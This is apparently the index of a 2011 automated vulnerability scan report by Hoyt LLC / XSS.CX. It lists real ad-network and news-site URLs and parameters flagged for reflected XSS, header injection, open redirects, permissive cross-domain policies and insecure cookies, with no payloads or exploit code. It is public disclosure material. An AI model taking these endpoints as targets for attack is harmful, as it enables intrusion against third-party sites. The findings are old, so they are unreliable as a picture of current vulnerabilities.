XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05092011-03

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Mon May 09 10:47:30 CDT 2011.


Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

Loading

1. HTTP header injection

1.1. http://ad.doubleclick.net/ad/N4873.npr.og/B5461009 [REST URL parameter 1]

1.2. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [REST URL parameter 1]

1.3. http://ad.doubleclick.net/adj/N2883.6441.USATODAY.COM/B5327539.11 [REST URL parameter 1]

1.4. http://ad.doubleclick.net/adj/cm.rub_usatoday/ [REST URL parameter 1]

1.5. http://ad.doubleclick.net/adj/ipc-csm/globalisation_US [REST URL parameter 1]

1.6. http://ad.doubleclick.net/adj/n6735.NPR/utility_search [REST URL parameter 1]

1.7. http://ad.doubleclick.net/dot.gif [REST URL parameter 1]

1.8. http://ad.doubleclick.net/pfadx/csmonitor_cim/ [name of an arbitrarily supplied request parameter]

1.9. http://ad.doubleclick.net/pfadx/csmonitor_cim/ [secure parameter]

1.10. http://bidder.mathtag.com/iframe/notify [exch parameter]

1.11. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js [$ parameter]

1.12. http://tacoda.at.atwola.com/rtx/r.js [N cookie]

1.13. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

1.14. http://tracker.bidder7.mookie1.com/tr-goog [u parameter]

2. Cross-site scripting (reflected)

2.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]

2.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]

2.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]

2.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]

2.5. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]

2.6. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]

2.7. http://480-adver-view.c3metrics.com/v.js [cid parameter]

2.8. http://480-adver-view.c3metrics.com/v.js [id parameter]

2.9. http://480-adver-view.c3metrics.com/v.js [t parameter]

2.10. http://a.collective-media.net/adj/cm.rub_usatoday/ [REST URL parameter 2]

2.11. http://a.collective-media.net/adj/cm.rub_usatoday/ [name of an arbitrarily supplied request parameter]

2.12. http://a.collective-media.net/adj/cm.rub_usatoday/ [sz parameter]

2.13. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [adurl parameter]

2.14. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [ai parameter]

2.15. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [client parameter]

2.16. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [num parameter]

2.17. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [sig parameter]

2.18. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [sz parameter]

2.19. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136 [adurl parameter]

2.20. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136 [ai parameter]

2.21. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136 [client parameter]

2.22. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136 [num parameter]

2.23. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136 [sig parameter]

2.24. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136 [sz parameter]

2.25. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8 [mt_adid parameter]

2.26. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8 [mt_id parameter]

2.27. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8 [mt_uuid parameter]

2.28. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8 [name of an arbitrarily supplied request parameter]

2.29. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8 [redirect parameter]

2.30. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8 [sz parameter]

2.31. http://ad.doubleclick.net/adj/N2883.6441.USATODAY.COM/B5327539.11 [sz parameter]

2.32. http://ads.bridgetrack.com/a/f/ [click parameter]

2.33. http://ads.bridgetrack.com/a/f/ [click parameter]

2.34. http://ads.bridgetrack.com/a/f/ [name of an arbitrarily supplied request parameter]

2.35. http://ads.pointroll.com/PortalServe/ [r parameter]

2.36. http://ads.pointroll.com/PortalServe/ [redir parameter]

2.37. http://ads.pointroll.com/PortalServe/ [time parameter]

2.38. http://api-public.addthis.com/url/shares.json [callback parameter]

2.39. http://ar.voicefive.com/b/rc.pli [func parameter]

2.40. http://b.scorecardresearch.com/beacon.js [c1 parameter]

2.41. http://b.scorecardresearch.com/beacon.js [c15 parameter]

2.42. http://b.scorecardresearch.com/beacon.js [c2 parameter]

2.43. http://b.scorecardresearch.com/beacon.js [c3 parameter]

2.44. http://b.scorecardresearch.com/beacon.js [c4 parameter]

2.45. http://b.scorecardresearch.com/beacon.js [c5 parameter]

2.46. http://b.scorecardresearch.com/beacon.js [c6 parameter]

2.47. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 [REST URL parameter 2]

2.48. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 [REST URL parameter 3]

2.49. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 [REST URL parameter 4]

2.50. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 [REST URL parameter 5]

2.51. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 [REST URL parameter 6]

2.52. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 [REST URL parameter 7]

2.53. http://choices.truste.com/ca [c parameter]

2.54. http://choices.truste.com/ca [h parameter]

2.55. http://choices.truste.com/ca [iplc parameter]

2.56. http://choices.truste.com/ca [ox parameter]

2.57. http://choices.truste.com/ca [plc parameter]

2.58. http://choices.truste.com/ca [w parameter]

2.59. http://choices.truste.com/ca [zi parameter]

2.60. http://content.usatoday.com/apps/insidepage/crc.ashx [callback parameter]

2.61. http://d7.zedo.com/bar/v16-406/d3/jsc/fm.js [$ parameter]

2.62. http://d7.zedo.com/bar/v16-406/d3/jsc/fm.js [$ parameter]

2.63. http://d7.zedo.com/bar/v16-406/d3/jsc/fm.js [q parameter]

2.64. http://d7.zedo.com/bar/v16-406/d3/jsc/fm.js [q parameter]

2.65. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js [$ parameter]

2.66. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js [$ parameter]

2.67. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js [q parameter]

2.68. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js [q parameter]

2.69. http://data.usatoday.net/apps/InsidePage [url parameter]

2.70. http://data.usatoday.net/apps/InsidePage [url parameter]

2.71. http://data.usatoday.net/apps/InsidePage [var parameter]

2.72. http://ds.addthis.com/red/psi/sites/www.fox8live.com/p.json [callback parameter]

2.73. http://event.adxpose.com/event.flow [uid parameter]

2.74. http://finance.fox8live.com/inergize.wvue [Module parameter]

2.75. http://finance.fox8live.com/inergize.wvue [REST URL parameter 1]

2.76. http://finance.fox8live.com/inergize.wvue [name of an arbitrarily supplied request parameter]

2.77. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [PluID parameter]

2.78. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [REST URL parameter 2]

2.79. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [REST URL parameter 3]

2.80. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [REST URL parameter 4]

2.81. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [REST URL parameter 5]

2.82. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [REST URL parameter 6]

2.83. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [c parameter]

2.84. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [cn parameter]

2.85. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [h parameter]

2.86. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [name of an arbitrarily supplied request parameter]

2.87. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [ncu parameter]

2.88. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [ord parameter]

2.89. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [pli parameter]

2.90. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [w parameter]

2.91. http://i.usatoday.net/asp/usatly/handler.ashx [longUrl parameter]

2.92. http://ib.adnxs.com/ab [cnd parameter]

2.93. http://ib.adnxs.com/ptj [redir parameter]

2.94. http://k.collective-media.net/cmadj/cm.rub_usatoday/ [REST URL parameter 2]

2.95. http://radar.weather.gov/Conus/images/favicon.ico [REST URL parameter 3]

2.96. http://radar.weather.gov/Conus/images/favicon.ico [REST URL parameter 3]

2.97. http://radar.weather.gov/Conus/index.php [REST URL parameter 1]

2.98. http://radar.weather.gov/Conus/index.php [REST URL parameter 1]

2.99. http://radar.weather.gov/Conus/index.php [REST URL parameter 1]

2.100. http://radar.weather.gov/Conus/index.php [REST URL parameter 2]

2.101. http://radar.weather.gov/images/favicon.ico [REST URL parameter 2]

2.102. http://radar.weather.gov/images/favicon.ico [REST URL parameter 2]

2.103. http://radar.weather.gov/radar.php [REST URL parameter 1]

2.104. http://radar.weather.gov/radar.php [product parameter]

2.105. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [cb parameter]

2.106. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [plckcommentonkey parameter]

2.107. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [plckcommentonkeytype parameter]

2.108. http://w10.localadbuy.com/servlet/ajrotator/2735/0/vj [REST URL parameter 1]

2.109. http://w10.localadbuy.com/servlet/ajrotator/2735/0/vj [REST URL parameter 2]

2.110. http://w10.localadbuy.com/servlet/ajrotator/541/0/vj [REST URL parameter 1]

2.111. http://w10.localadbuy.com/servlet/ajrotator/541/0/vj [REST URL parameter 2]

2.112. http://w10.localadbuy.com/servlet/ajrotator/543/0/vj [REST URL parameter 1]

2.113. http://w10.localadbuy.com/servlet/ajrotator/543/0/vj [REST URL parameter 2]

2.114. http://w10.localadbuy.com/servlet/ajrotator/546/0/vj [REST URL parameter 1]

2.115. http://w10.localadbuy.com/servlet/ajrotator/546/0/vj [REST URL parameter 2]

2.116. http://w10.localadbuy.com/servlet/ajrotator/550/0/vj [REST URL parameter 1]

2.117. http://w10.localadbuy.com/servlet/ajrotator/550/0/vj [REST URL parameter 2]

2.118. http://w10.localadbuy.com/servlet/ajrotator/551/0/vj [REST URL parameter 1]

2.119. http://w10.localadbuy.com/servlet/ajrotator/551/0/vj [REST URL parameter 2]

2.120. http://wvue.web.entriq.net/nw/dpm/loadplayer/ [REST URL parameter 1]

2.121. http://wvue.web.entriq.net/nw/dpm/loadplayer/ [playerID parameter]

2.122. http://www.collegesurfing.com/searchbox-mge-us.php [id parameter]

2.123. http://www.csmonitor.com/Business [REST URL parameter 1]

2.124. http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down [REST URL parameter 1]

2.125. http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down [REST URL parameter 2]

2.126. http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down [REST URL parameter 3]

2.127. http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down [REST URL parameter 4]

2.128. http://www.fox8live.com/widgets/serve.aspx [name of an arbitrarily supplied request parameter]

2.129. http://www.macroaxis.com/widgets/url.jsp [name of an arbitrarily supplied request parameter]

2.130. http://www.macroaxis.com/widgets/url.jsp [s parameter]

2.131. http://www.macroaxis.com/widgets/url.jsp [t parameter]

2.132. http://www.npr.org/templates/reg/forgot-password-submit.php [public_user_email parameter]

2.133. http://www.therepublic.com/assets/gzip.php [f0 parameter]

2.134. http://www.therepublic.com/assets/gzip.php [f0 parameter]

2.135. http://www.therepublic.com/assets/gzip.php [f1 parameter]

2.136. http://www.therepublic.com/assets/gzip.php [f1 parameter]

2.137. http://www.therepublic.com/assets/gzip.php [f2 parameter]

2.138. http://www.therepublic.com/assets/gzip.php [f2 parameter]

2.139. http://www.therepublic.com/assets/gzip.php [f3 parameter]

2.140. http://www.therepublic.com/assets/gzip.php [name of an arbitrarily supplied request parameter]

2.141. http://www.therepublic.com/assets/gzip.php [name of an arbitrarily supplied request parameter]

2.142. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [Referer HTTP header]

2.143. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]

2.144. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

2.145. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

2.146. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

2.147. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

2.148. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]

2.149. http://ar.voicefive.com/bmx3/broker.pli [ar_p84552060 cookie]

2.150. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]

2.151. http://ar.voicefive.com/bmx3/broker.pli [ar_p90452457 cookie]

2.152. http://ar.voicefive.com/bmx3/broker.pli [ar_p91136705 cookie]

2.153. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]

2.154. http://ar.voicefive.com/bmx3/broker.pli [ar_p92429851 cookie]

2.155. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]

2.156. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie]

2.157. http://d7.zedo.com/bar/v16-406/d3/jsc/fm.js [ZEDOIDA cookie]

2.158. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js [ZEDOIDA cookie]

2.159. http://ib.adnxs.com/acb [acb145072 cookie]

2.160. http://ib.adnxs.com/acb [acb893170 cookie]

2.161. http://k.collective-media.net/cmadj/cm.rub_usatoday/ [cli cookie]

2.162. http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html [ruid cookie]

3. Flash cross-domain policy

3.1. http://a.collective-media.net/crossdomain.xml

3.2. http://a1.interclick.com/crossdomain.xml

3.3. http://action.mathtag.com/crossdomain.xml

3.4. http://ad.amgdgt.com/crossdomain.xml

3.5. http://ad.doubleclick.net/crossdomain.xml

3.6. http://ads.pointroll.com/crossdomain.xml

3.7. http://amch.questionmarket.com/crossdomain.xml

3.8. http://analytics.newsinc.com/crossdomain.xml

3.9. http://ar.voicefive.com/crossdomain.xml

3.10. http://assets1.grouponcdn.com/crossdomain.xml

3.11. http://at.amgdgt.com/crossdomain.xml

3.12. http://b.scorecardresearch.com/crossdomain.xml

3.13. http://b.voicefive.com/crossdomain.xml

3.14. http://b3.mookie1.com/crossdomain.xml

3.15. http://bh.contextweb.com/crossdomain.xml

3.16. http://bs.serving-sys.com/crossdomain.xml

3.17. http://cache-01.cleanprint.net/crossdomain.xml

3.18. http://cdn.gigya.com/crossdomain.xml

3.19. http://cdn.interclick.com/crossdomain.xml

3.20. http://cdn.taboolasyndication.com/crossdomain.xml

3.21. http://cr0.worthathousandwords.com/crossdomain.xml

3.22. http://d7.zedo.com/crossdomain.xml

3.23. http://ds.serving-sys.com/crossdomain.xml

3.24. http://event.adxpose.com/crossdomain.xml

3.25. http://finance.fox8live.com/crossdomain.xml

3.26. http://fls.doubleclick.net/crossdomain.xml

3.27. http://fw.adsafeprotected.com/crossdomain.xml

3.28. http://gannett.gcion.com/crossdomain.xml

3.29. http://gscounters.gigya.com/crossdomain.xml

3.30. http://ib.adnxs.com/crossdomain.xml

3.31. http://ic.nexac.com/crossdomain.xml

3.32. http://idcs.interclick.com/crossdomain.xml

3.33. http://k.collective-media.net/crossdomain.xml

3.34. http://log30.doubleverify.com/crossdomain.xml

3.35. http://map.media6degrees.com/crossdomain.xml

3.36. http://metrics.csmonitor.com/crossdomain.xml

3.37. http://metrics.npr.org/crossdomain.xml

3.38. http://mobile.fox8live.com/crossdomain.xml

3.39. http://pix04.revsci.net/crossdomain.xml

3.40. http://pixel.quantserve.com/crossdomain.xml

3.41. http://radar.weather.gov/crossdomain.xml

3.42. http://s.meebocdn.net/crossdomain.xml

3.43. http://s0.2mdn.net/crossdomain.xml

3.44. http://secure-us.imrworldwide.com/crossdomain.xml

3.45. http://segment-pixel.invitemedia.com/crossdomain.xml

3.46. http://spd.pointroll.com/crossdomain.xml

3.47. http://speed.pointroll.com/crossdomain.xml

3.48. http://stp.fox8live.com/crossdomain.xml

3.49. http://t.mookie1.com/crossdomain.xml

3.50. http://t.pointroll.com/crossdomain.xml

3.51. http://trc.taboolasyndication.com/crossdomain.xml

3.52. http://usatoday1.112.2o7.net/crossdomain.xml

3.53. http://va.px.invitemedia.com/crossdomain.xml

3.54. http://w10.localadbuy.com/crossdomain.xml

3.55. http://widget.newsinc.com/crossdomain.xml

3.56. http://wvue.web.entriq.net/crossdomain.xml

3.57. http://www.fox8live.com/crossdomain.xml

3.58. http://www.groupon.com/crossdomain.xml

3.59. https://www.groupon.com/crossdomain.xml

3.60. http://xedge.aperture.displaymarketplace.com/crossdomain.xml

3.61. http://adadvisor.net/crossdomain.xml

3.62. http://ads.bridgetrack.com/crossdomain.xml

3.63. http://content.usatoday.com/crossdomain.xml

3.64. http://contextweb.usatoday.net/crossdomain.xml

3.65. http://data.usatoday.net/crossdomain.xml

3.66. http://googleads.g.doubleclick.net/crossdomain.xml

3.67. http://i.usatoday.net/crossdomain.xml

3.68. http://optimized-by.rubiconproject.com/crossdomain.xml

3.69. http://pagead2.googlesyndication.com/crossdomain.xml

3.70. http://pubads.g.doubleclick.net/crossdomain.xml

3.71. http://rd.meebo.com/crossdomain.xml

3.72. http://share.meebo.com/crossdomain.xml

3.73. http://static.ak.fbcdn.net/crossdomain.xml

3.74. http://syndication.mmismm.com/crossdomain.xml

3.75. http://videos.usatoday.net/crossdomain.xml

3.76. http://www.collegesurfing.com/crossdomain.xml

3.77. http://www.facebook.com/crossdomain.xml

3.78. http://www.meebo.com/crossdomain.xml

3.79. http://www.npr.org/crossdomain.xml

3.80. http://www.usatoday.com/crossdomain.xml

3.81. http://api.twitter.com/crossdomain.xml

4. Silverlight cross-domain policy

4.1. http://ad.doubleclick.net/clientaccesspolicy.xml

4.2. http://ads.pointroll.com/clientaccesspolicy.xml

4.3. http://b.scorecardresearch.com/clientaccesspolicy.xml

4.4. http://b.voicefive.com/clientaccesspolicy.xml

4.5. http://content.usatoday.com/clientaccesspolicy.xml

4.6. http://contextweb.usatoday.net/clientaccesspolicy.xml

4.7. http://data.usatoday.net/clientaccesspolicy.xml

4.8. http://i.usatoday.net/clientaccesspolicy.xml

4.9. http://metrics.csmonitor.com/clientaccesspolicy.xml

4.10. http://metrics.npr.org/clientaccesspolicy.xml

4.11. http://s0.2mdn.net/clientaccesspolicy.xml

4.12. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

4.13. http://spd.pointroll.com/clientaccesspolicy.xml

4.14. http://speed.pointroll.com/clientaccesspolicy.xml

4.15. http://usatoday1.112.2o7.net/clientaccesspolicy.xml

4.16. http://www.usatoday.com/clientaccesspolicy.xml

5. Cleartext submission of password

5.1. http://www.therepublic.com/login/

5.2. http://www.therepublic.com/login/register/

6. SSL cookie without secure flag set

6.1. https://shop.npr.org/index.php

6.2. https://www.groupon.com/dallas/

6.3. https://www.groupon.com/learn

6.4. https://www.groupon.com/login

6.5. https://www.groupon.com/mobile

6.6. https://www.groupon.com/users

6.7. https://www.groupon.com/users/new

7. Session token in URL

7.1. http://login.npr.org/openid/embed

7.2. http://www.facebook.com/extern/login_status.php

7.3. http://www.npr.org/templates/reg/login.php

8. ASP.NET ViewState without MAC enabled

8.1. http://mobile.fox8live.com/BlackBerry/default.aspx

8.2. http://mobile.fox8live.com/business/story/McDonalds-sales-figure-rises-in-April/R4RfiqAYuEi3vjN-k7UjyA.cspx

8.3. http://mobile.fox8live.com/default.aspx

8.4. http://mobile.fox8live.com/news/local/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx

8.5. http://mobile.fox8live.com/news/local/story/Mississippi-River-could-crest-Monday-at-Memphis/-sFvNvd1p0GN8i4ye5E8eA.cspx

8.6. http://mobile.fox8live.com/sports/default.aspx

8.7. http://mobile.fox8live.com/sports/story/Preds-try-to-stay-alive-in-Game-6-against/05o1Jx8CaEW77q1kiAhtgA.cspx

8.8. http://mobile.fox8live.com/weather/default.aspx

8.9. http://www.fox8live.com/business/default.aspx

8.10. http://www.fox8live.com/business/iframe_financialticker.aspx

8.11. http://www.fox8live.com/business/iframe_indexwatch.aspx

8.12. http://www.fox8live.com/content/aboutus/default.aspx

8.13. http://www.fox8live.com/content/news/lee_zurik_investigation/default.aspx

8.14. http://www.fox8live.com/content/news/seregni/default.aspx

8.15. http://www.fox8live.com/content/news/watercooler/default.aspx

8.16. http://www.fox8live.com/default.aspx

8.17. http://www.fox8live.com/entertainment/horoscopes/default.aspx

8.18. http://www.fox8live.com/mostpopular/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx

8.19. http://www.fox8live.com/news/local/story/St-Bernard-prepares-for-rising-Mississippi-River/vJUO9a9n60iNAXZ6QCm2oQ.cspx

8.20. http://www.fox8live.com/rss/default.aspx

8.21. http://www.fox8live.com/widgets/serve.aspx

8.22. http://www.fox8live.com/wireless/default.aspx

9. Open redirection

9.1. http://bh.contextweb.com/bh/rtset [rurl parameter]

9.2. http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [REST URL parameter 2]

9.3. http://trc.taboolasyndication.com/log/usatoday/debug [url parameter]

9.4. http://trc.taboolasyndication.com/usatoday/log/2/available [url parameter]

9.5. http://trc.taboolasyndication.com/usatoday/log/2/display [url parameter]

9.6. http://trc.taboolasyndication.com/usatoday/log/2/visible [url parameter]

9.7. https://www.groupon.com/users [Referer HTTP header]

10. Cookie scoped to parent domain

10.1. http://api.twitter.com/1/wvuefox8/lists/wvue-fox-8-3/statuses.json

10.2. http://t.mookie1.com/t/v1/imp

10.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

10.4. http://a1.interclick.com/ColDta.aspx

10.5. http://ad.amgdgt.com/ads/

10.6. http://ad.doubleclick.net/clk

10.7. http://ads.pointroll.com/PortalServe/

10.8. http://ads.revsci.net/adserver/ako

10.9. http://ads.revsci.net/adserver/ako

10.10. http://amch.questionmarket.com/adsc/d887938/3/500004862365/decide.php

10.11. http://ar.voicefive.com/b/wc_beacon.pli

10.12. http://ar.voicefive.com/bmx3/broker.pli

10.13. http://at.amgdgt.com/ads/

10.14. http://b.scorecardresearch.com/b

10.15. http://b.scorecardresearch.com/p

10.16. http://b.voicefive.com/b

10.17. http://bh.contextweb.com/bh/rtset

10.18. http://bidder.mathtag.com/iframe/notify

10.19. http://bs.serving-sys.com/BurstingPipe/adServer.bs

10.20. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js

10.21. http://ds.addthis.com/red/psi/sites/www.fox8live.com/p.json

10.22. http://ib.adnxs.com/ab

10.23. http://ib.adnxs.com/acb

10.24. http://ib.adnxs.com/getuid

10.25. http://ib.adnxs.com/ptj

10.26. http://ib.adnxs.com/ptj

10.27. http://ib.adnxs.com/ptj

10.28. http://ib.adnxs.com/seg

10.29. http://idcs.interclick.com/Segment.aspx

10.30. http://image2.pubmatic.com/AdServer/Pug

10.31. http://leadback.advertising.com/adcedge/lb

10.32. http://map.media6degrees.com/orbserv/hbpix

10.33. http://odb.outbrain.com/utils/get

10.34. http://odb.outbrain.com/utils/get

10.35. http://odb.outbrain.com/utils/ping.html

10.36. http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html

10.37. http://pix04.revsci.net/D08734/a1/0/3/0.js

10.38. http://pix04.revsci.net/J06575/a4/0/0/pcx.js

10.39. http://pix04.revsci.net/J06575/b3/0/3/1003161/235941171.js

10.40. http://pix04.revsci.net/J06575/b3/0/3/1003161/498787488.js

10.41. http://pix04.revsci.net/J06575/b3/0/3/1003161/807655569.js

10.42. http://r.openx.net/set

10.43. http://r1-ads.ace.advertising.com/site=786652/size=728090/u=2/bnum=46632794/hr=10/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.usatoday.com%252Fweather%252Ffloods%252F2011-05-02-ohio-mississippi-river-floods_n.htm

10.44. http://segment-pixel.invitemedia.com/pixel

10.45. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6544434

10.46. http://sitelife.usatoday.com/ver1.0/Stats/Tracker.gif

10.47. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app

10.48. http://sitelife.usatoday.com/ver1.0/usat/pluck/comments/comments.js

10.49. http://sitelife.usatoday.com/ver1.0/usat/pluck/pluck.js

10.50. http://syndication.mmismm.com/tntwo.php

10.51. http://tacoda.at.atwola.com/rtx/r.js

10.52. http://tags.bluekai.com/site/3775

10.53. http://tags.bluekai.com/site/3869

10.54. http://trgc.opt.fimserve.com/fp.gif

10.55. http://trgca.opt.fimserve.com/fp.gif

10.56. http://va.px.invitemedia.com/adnxs_imp

10.57. http://www.groupon.com/dallas/

10.58. http://www.groupon.com/learn

10.59. http://www.groupon.com/mobile

10.60. http://www.groupon.com/privacy

10.61. http://www.groupon.com/subscriptions/new

10.62. https://www.groupon.com/dallas/

10.63. https://www.groupon.com/learn

10.64. https://www.groupon.com/login

10.65. https://www.groupon.com/mobile

10.66. https://www.groupon.com/users

10.67. https://www.groupon.com/users/new

10.68. http://www.tinbuadserv.com/v3/serve.php

11. Cookie without HttpOnly flag set

11.1. http://ads.adxpose.com/ads/ads.js

11.2. http://beacon-1.newrelic.com/1/fffa2293e6

11.3. http://event.adxpose.com/event.flow

11.4. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

11.5. http://shop.npr.org/

11.6. https://shop.npr.org/index.php

11.7. http://t.mookie1.com/t/v1/imp

11.8. http://trc.taboolasyndication.com/usatoday/trc/2/json

11.9. http://widgets.macroaxis.com/widgets/content.jsp

11.10. http://www.macroaxis.com/widgets/url.jsp

11.11. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

11.12. http://a1.interclick.com/ColDta.aspx

11.13. http://a1.interclick.com/getInPageJSProcess.aspx

11.14. http://ad.amgdgt.com/ads/

11.15. http://ad.doubleclick.net/clk

11.16. http://ad.yieldmanager.com/pixel

11.17. http://ads.bridgetrack.com/a/f/

11.18. http://ads.pointroll.com/PortalServe/

11.19. http://ads.revsci.net/adserver/ako

11.20. http://ads.revsci.net/adserver/ako

11.21. http://amch.questionmarket.com/adsc/d887938/3/500004862365/decide.php

11.22. http://api.twitter.com/1/wvuefox8/lists/wvue-fox-8-3/statuses.json

11.23. http://ar.voicefive.com/b/wc_beacon.pli

11.24. http://ar.voicefive.com/bmx3/broker.pli

11.25. http://at.amgdgt.com/ads/

11.26. http://atd.agencytradingdesk.net/WatsonTracker/IMP/A1000138/C1000187/P1003017/pixel.gif

11.27. http://b.scorecardresearch.com/b

11.28. http://b.scorecardresearch.com/p

11.29. http://b.voicefive.com/b

11.30. http://bh.contextweb.com/bh/rtset

11.31. http://bidder.mathtag.com/iframe/notify

11.32. http://bs.serving-sys.com/BurstingPipe/adServer.bs

11.33. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js

11.34. http://ds.addthis.com/red/psi/sites/www.fox8live.com/p.json

11.35. http://idcs.interclick.com/Segment.aspx

11.36. http://image2.pubmatic.com/AdServer/Pug

11.37. http://leadback.advertising.com/adcedge/lb

11.38. http://map.media6degrees.com/orbserv/hbpix

11.39. http://odb.outbrain.com/utils/get

11.40. http://odb.outbrain.com/utils/get

11.41. http://odb.outbrain.com/utils/ping.html

11.42. http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html

11.43. http://pix04.revsci.net/D08734/a1/0/3/0.js

11.44. http://pix04.revsci.net/J06575/a4/0/0/pcx.js

11.45. http://pix04.revsci.net/J06575/b3/0/3/1003161/235941171.js

11.46. http://pix04.revsci.net/J06575/b3/0/3/1003161/498787488.js

11.47. http://pix04.revsci.net/J06575/b3/0/3/1003161/807655569.js

11.48. http://r.openx.net/set

